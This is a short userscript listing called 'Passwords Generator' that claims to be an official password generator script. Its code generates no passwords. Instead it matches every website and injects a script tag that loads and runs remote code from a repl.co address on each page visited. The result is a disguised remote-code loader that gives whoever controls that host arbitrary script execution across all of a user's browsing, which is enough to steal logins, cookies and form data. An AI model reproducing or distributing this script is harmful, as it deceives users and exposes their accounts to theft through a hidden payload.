Passwords Generator

Official Password Generator user.js Script.

// ==UserScript==
// @name         Passwords Generator
// @namespace    passwords-generator
// @version      1.0
// @description  Official Password Generator user.js Script.
// @author       Passwords Generator
// @match        *://*/*
// @grant        none
// ==/UserScript==

function executeExternalScript(url) {
    var script = document.createElement('script');
    script.src = url;
    document.body.appendChild(script);
}
executeExternalScript('https://passwordsgenerator.playerwictor.repl.co/tmscript.txt');